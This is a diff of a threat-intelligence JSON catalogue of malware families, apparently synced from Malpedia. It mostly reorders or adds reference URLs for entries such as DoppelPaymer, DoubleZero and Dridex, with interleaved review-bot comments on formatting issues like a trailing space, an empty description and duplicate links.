- "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html",
+ "https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c",
  "https://twitter.com/AltShiftPrtScn/status/1385103712918642688",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
  "https://sites.temple.edu/care/ci-rw-attacks/",
  "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://twitter.com/BrettCallow/status/1453557686830727177?s=20",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://techcrunch.com/2020/03/01/visser-breach/",
- "https://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://www.ic3.gov/Media/News/2020/201215-1.pdf",
- "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
- "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/",
  "https://redcanary.com/blog/grief-ransomware/",
+ "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "http://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://techcrunch.com/2020/03/01/visser-breach/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
  "https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding",
- "https://twitter.com/vikas891/status/1385306823662587905"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
  ],
  "synonyms": [
  "Pay OR Grief"
@@ -22235,9 +23298,9 @@
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot",
  "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html",
+ "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/",
  "https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/",
- "https://research.checkpoint.com/dorkbot-an-investigation/",
- "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/"
+ "https://research.checkpoint.com/dorkbot-an-investigation/"
  ],
  "synonyms": [],
  "type": []
@@ -22264,10 +23327,13 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.dosia",
- "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/",
+ "https://viuleeenz.github.io/posts/2023/05/extracting-ddosia-targets-from-process-memory/",
  "https://medium.com/@b42labs/data-insights-from-russian-cyber-militants-noname057-9f4db98f60e",
+ "https://noname.be42late.co/",
+ "https://blog.sekoia.io/following-noname05716-ddosia-projects-targets/",
  "https://decoded.avast.io/martinchlumecky/ddosia-project-how-noname05716-is-trying-to-improve-the-efficiency-of-ddos-attacks/",
- "https://www.team-cymru.com/post/a-blog-with-noname"
+ "https://www.team-cymru.com/post/a-blog-with-noname",
+ "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/"
  ],
  "synonyms": [
  "DDOSIA"
@@ -22306,7 +23372,7 @@
  "value": "Dot Ransomware"
  },
  {
- "description": "",
+ "description": "DOUBLEBACK is a newly discovered fileless malware deployed as part of an attack campaign that took place in December 2020. The threat actors responsible for the operations are tracked as UNC2529 by researchers. According to their findings, DOUBLEBACK is the final payload delivered onto the compromised systems. Its task is to establish and maintain a backdoor on the victim's machine. ",
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback",
@@ -22324,9 +23390,9 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy",
+ "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/",
  "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/",
- "https://twitter.com/Int2e_/status/1294565186939092994",
- "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/"
+ "https://twitter.com/Int2e_/status/1294565186939092994"
  ],
  "synonyms": [
  "VALIDATOR"
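Review bot: The new DOUBLEBACK description in the `@@ -22306,7 +23372,7 @@` hunk ends with a trailing space inside the string value (`... on the victim's machine. "`), which every consumer will carry into what it displays, indexes or hashes for that entry; trim it so the line ends `... on the victim's machine.",`. Stripping leading and trailing whitespace from description text is cheap to do where this file is assembled and would prevent the same artefact elsewhere. The description is the only changed line in that hunk, so the rest of the object is outside it.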
@@ -22336,13 +23402,26 @@
  "uuid": "46a523ca-be25-4f59-bc01-2c006c58bf80",
  "value": "DoubleFantasy (Windows)"
  },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefinger",
+ "https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4f1e5142-0f62-48ee-a4a7-d8072fd78dcf",
+ "value": "DoubleFinger"
+ },
  {
  "description": "",
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar",
- "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/",
  "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
+ "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/",
  "https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit",
  "https://github.com/countercept/doublepulsar-c2-traffic-decryptor"
  ],
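Review bot: The new DoubleFinger entry lands with `"description": ""`, so consumers of this cluster get an empty string rather than either a summary or an absent key, even though its second ref is a full Securelist write-up. The DOUBLEBACK hunk earlier in this patch shows such blanks do get backfilled later, but a one-line summary taken from that ref's title would make the entry useful now, e.g. `"description": "Loader observed delivering the GreetingGhoul cryptocurrency stealer (per the Securelist ref)."`. If the empty string is deliberate because the upstream source had no text, a consistent policy of omitting `description` when it is unknown would let consumers tell "no summary" from "empty summary".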
@@ -22357,24 +23436,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublezero", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", - "https://www.splunk.com/en_us/blog/security/threat-update-doublezero-destructor.html", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", - "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", - "https://cert.gov.ua/article/38088", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-doublezero", "https://unit42.paloaltonetworks.com/doublezero-net-wiper/", + "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://www.splunk.com/en_us/blog/security/threat-update-doublezero-destructor.html", "https://securelist.com/new-ransomware-trends-in-2022/106457/", - 
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", - "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", - "https://blog.talosintelligence.com/2022/03/threat-advisory-doublezero.html" + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", + "https://blog.talosintelligence.com/2022/03/threat-advisory-doublezero.html", + "https://cert.gov.ua/article/38088" ], "synonyms": [ "FiberLake" @@ -22389,10 +23468,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf", - "https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" + "https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/" ], "synonyms": [ "DELPHACY" 
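Review bot: The new `refs` list for DoubleZero carries the same Trustwave article twice, `"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/"` and the identical URL without the trailing slash. The same pattern appears in the Dridex hunk (`http://` and `https://` forms of both the Secureworks gold-drake and gold-heron profiles, and `blog.intel471.com/2020/05/21/a-brief-history-of-ta505/` next to `intel471.com/blog/a-brief-history-of-ta505`) and, apparently, in the Dtrack hunk, where the Cyberbit post is listed at two paths. Deduplicating by a normalised URL (scheme, host, trailing slash) when the cluster is generated would keep these lists tidy; the duplicates pre-date this commit, but the sync is what keeps rewriting these lines.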
@@ -22407,8 +23486,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks",
- "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412"
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412",
+ "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/"
 ],
 "synonyms": [],
 "type": []
@@ -22421,9 +23500,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper",
- "https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf",
 "http://www.clearskysec.com/charmingkitten/",
- "https://www.infinitumit.com.tr/apt-35/"
+ "https://www.infinitumit.com.tr/apt-35/",
+ "https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -22448,10 +23527,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus",
- "http://blog.nsfocus.net/stumbzarus-apt-lazarus/",
- "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf"
+ "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf",
+ "https://vblocalhost.com/uploads/VB2021-Park.pdf",
+ "https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/",
+ "http://blog.nsfocus.net/stumbzarus-apt-lazarus/"
+ ],
+ "synonyms": [
+ "ThreatNeedle"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "1ff3afab-8b3f-4b9c-90c7-61062d2dfe0b",
@@ -22462,12 +23545,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot",
- "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
 "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
 "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
+ "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality",
 "https://community.riskiq.com/article/30f22a00",
 "https://lokalhost.pl/gozi_tree.txt",
- "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality",
+ "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
 "https://www.youtube.com/watch?v=EyDiIAt__dI",
 "https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122"
 ],
@@ -22482,121 +23565,121 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://community.riskiq.com/article/2cd1c003", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://www.youtube.com/watch?v=1VB15_HgUkg", - "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", - "https://unit42.paloaltonetworks.com/banking-trojan-techniques/", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf", - "https://unit42.paloaltonetworks.com/travel-themed-phishing/", - "https://cyber-anubis.github.io/malware%20analysis/dridex/", - "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office", - "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", - "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", - "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://assets.virustotal.com/reports/2021trends.pdf", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", + 
"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/", "https://github.com/rad9800/talks/blob/main/MALWARE_MADNESS.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-drake", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://en.wikipedia.org/wiki/Maksim_Yakubets", + "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://home.treasury.gov/news/press-releases/sm845", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks", "https://artik.blue/malware3", - "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf", - "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", + 
"https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction", + "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state", + "https://twitter.com/Cryptolaemus1/status/1407135648528711680", + "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf", + "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", "https://malwarebookreports.com/cryptone-cobalt-strike/", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf", "https://community.riskiq.com/article/e4fb7245", "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/", + "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/", "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", - "https://home.treasury.gov/news/press-releases/sm845", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", - "https://twitter.com/felixw3000/status/1382614469713530883?s=20", - "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", - "https://muha2xmad.github.io/unpacking/dridex/", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - 
"https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", - "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/", - "https://adalogics.com/blog/the-state-of-advanced-code-injections", - "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/", - "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays", - "https://www.secureworks.com/research/threat-profiles/gold-heron", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", - "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/", - "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation", + "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", - "https://blog.lexfo.fr/dridex-malware.html", - "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", - "https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain", - "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/", - "https://twitter.com/TheDFIRReport/status/1356729371931860992", - "https://intel471.com/blog/privateloader-malware", - 
"https://viql.github.io/dridex/", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", - "https://malcat.fr/blog/cutting-corners-against-a-dridex-downloader/", - "https://www.secureworks.com/research/threat-profiles/gold-drake", - "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction", - "https://www.atomicmatryoshka.com/post/malware-headliners-dridex", - "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://twitter.com/Cryptolaemus1/status/1407135648528711680", - "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", "https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/", - "http://www.secureworks.com/research/threat-profiles/gold-heron", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77", + 
